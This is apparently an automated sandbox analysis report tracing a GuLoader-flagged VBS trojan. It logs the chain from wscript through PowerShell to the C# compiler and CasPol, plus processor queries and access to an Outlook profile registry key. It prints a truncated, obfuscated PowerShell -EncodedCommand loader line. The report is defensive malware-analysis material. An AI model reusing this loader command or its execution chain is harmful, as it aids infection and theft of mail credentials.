Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAgAFUAbgBSAFAAbABlAEEAZgB0AFMAawByAFcAcgApAE8AcAA7AAoARwBsAFsAVABhAEQAVABlAGwASABvAGwAQQBuAEkARABvAG0AUwBuAHAATgBvAG8AYQB1AHIAUwBrAHQATwBjACgARwBsACIATABpAHcASAB5AGkAUwBhAG4ATwBiAG0AYQBjAG0AQgBhAC4AUwBtAGQAcABoAGwATwBuAGwAUABhACIAYQBsACkARQB4AF0AQQByAHAATQBvAHUAUwBpAGIAQQBhAGwAVABlAGkARABpAGMAUgBpACAAUwB0AHMARABlAHQATQBlAGEAQwB1AHQAQgBlAGkAVABoAGMATABhACAAQwBvAGUARABhAHgARQByAHQAdABvAGUAVABhAHIAQQBtAG4AUgB1ACAAQQByAGkARwByAG4ARwByAHQATABvACAAaABlAEcATABlAGUAVABhAHQAQQBxAEQARQBrAHIATQB5AGkARABvAHYAagBvAGUASABvAHIATA	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA2B2.tmp" "c:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP"	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fo0nlcmw.oxc.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@12/12@3/3

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9100:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9100:120:WilError_03

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PUMP mt310143121.vbs"

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 0000001A.00000000.1970106356.0000000001350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2220743788.0000000009E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08508928 push eax; retf	20_2_08508931
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088C5360 push es; ret	20_2_088C53B6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08B6C2A1 push eax; mov dword ptr [esp], edx	20_2_08B6C2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08B63AF0 push eax; mov dword ptr [esp], edx	20_2_08B63AF4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08B6CD80 pushad ; retf	20_2_08B6CD81
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08B640E8 push eax; mov dword ptr [esp], edx	20_2_08B640EC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08B6E670 push eax; mov dword ptr [esp], ecx	20_2_08B6E684
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08C6F8A8 push ebp; retf	20_2_08C6F8B6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08C6F8B8 push esi; retf	20_2_08C6F8F6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08C68168 push eax; retf	20_2_08C68172
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08C68297 push esi; retf	20_2_08C682B2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08C61410 push es; ret	20_2_08C61426
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08C6EEA0 push ecx; retf	20_2_08C6EF3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20B08612 push 8BFFFFFFh; retf	26_2_20B08618

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.dll

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
